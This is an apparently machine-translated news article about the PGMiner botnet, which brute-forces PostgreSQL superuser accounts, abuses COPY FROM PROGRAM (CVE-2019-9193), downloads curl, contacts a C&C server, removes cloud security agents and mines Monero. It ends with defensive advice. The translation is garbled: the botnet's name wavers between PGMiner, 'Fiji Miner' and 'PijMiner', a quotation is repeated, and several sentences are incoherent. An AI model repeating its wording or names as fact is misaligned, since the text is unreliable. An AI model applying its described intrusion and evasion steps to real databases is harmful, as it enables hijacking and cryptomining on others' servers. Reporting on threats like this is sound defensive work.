A new type of Linux-based botnet was discovered aimed at mining cryptocurrencies. The botnet is said to exploit a vulnerability to remote code execution found in the PostgreSQL database, and it is said to show an appearance in many respects that existing botnets did not. Discovered and announced by security company Palo Alto Networks.
A popular open source relational database management system, PostgreSQL, also known as Postgres, is widely used in production environments. CVE-2019-9193 is the remote code execution vulnerability discovered here and the botnet was named PGMiner. PostgreSQL databases targeting botnets say this is the first to be discovered.
“PostgreSQL’s’copy from program’ feature is currently being exploited. This feature was first introduced through version 9.3 in September 2013.”PostgreSQL’s program copy feature is currently being exploited. This feature was first introduced in September 2013 via version 9.3.
Furthermore this vulnerability was first discovered in 2018 and was even attached to a CVE number, but after that the community of PostgreSQL claimed that it was not a vulnerability, and now it is said to have a ‘bug in dispute’ status. The discovery of the botnet, however, proved that they are all the same in that they can be exploited by attackers, whether they are in dispute or the vulnerability’s exact name.
Palo Alto explains which cyber attackers would prefer to “allowing a local or remote superuser to run shell scripts directly on the server,” the function in question. There is also an aspect, however that a remote code execution attack can not be established unless a remote user or an untrusted user is given the superuser privilege. It is also said that through access management and authentication systems, it can be defended.
This means that when the authentication-related environment settings are not properly set, remote code execution attacks can be allowed. In the case of the Fiji Miner attackers, the superuser account was found to have been breached by brute force attacks.
First of all, botnet malware connects to a client library that locates target database servers. And on these DB servers, a brute force attack is applied. Palo Alto explained that the attackers ran it with a list of easy passwords such as 112233 or 1q2w3e4r. A brute force attack includes inserting breakthrough passwords until they are breached.
Botnet malware uses curl to execute several features once you’ve become a superuser. Curl is a command line tool that is capable of sending data from or to a server.
Various techniques are used to download the curl library and move it to the execution path if there is no curl in the victim’s system. You can download and install the official package directly at this time, or download the Static Curl library from GitHub. “It is sometimes downloaded using /dev/tcp, which is very uncommon among the many attack strategies found to date.”
Then the attackers connect the malware from the botnet to the C&C server. The proxy used at this time was SOCKS5. After that the system information is collected and transmitted to the C&C, and the attackers identify the victim based on this and select the appropriate cryptocurrency mining payload and transmit it. PijMiner finds a folder that allows the creation of a new file in a folder list, and changes the properties of the first folder that is found. This guarantees that on the victim’s computer the malicious payload is executed.
Cloud security tools like Aegis and Yunjing are being deleted by attackers who have gone so far. Next it checks the virtual machines and kills other processes that are CPU intensive. Again it will be terminated if someone is already in the mining process. The CPU processor is used to mine Monero coins after cleaning up the surroundings. Furthermore, certain modules are downloaded repeatedly.
It is hard to know exactly how much profit the attackers have made through Fiji Miner until now. This is because not much activity exists. PostgreSQL users should remove the pg execute server program privilege from untrusted users to protect the DB from such attacks. This alone makes the attack mentioned above impossible. It is a good idea to check if it is running a process called tracepath and terminate it.
Palo Alto argues, “Attackers were able to mine cryptocurrencies without sound rumors thanks to getting a label that the security bug exploited this time was not clearly labeled as a vulnerability, but was in controversy’. It means that arguments such as vulnerability or can not assist attackers.”
The following are new and rare attack strategies and methods discovered at Fiji Miner.
1) Inserting the victim’s ID into the application
2) Impersonating a name for a trusted process
3) Using multiple paths, download the curl binary
4) Aggressively terminating other mining programs
5) Downloading over and over specific modules and cryptocurrency mining malware
6) Changing the C&C address continuously
Palo Alto concluded that’ Fiji Miner is still evolving.’ He warned that not only on Linux, but also on Windows and macOS, there is a high possibility of malware running.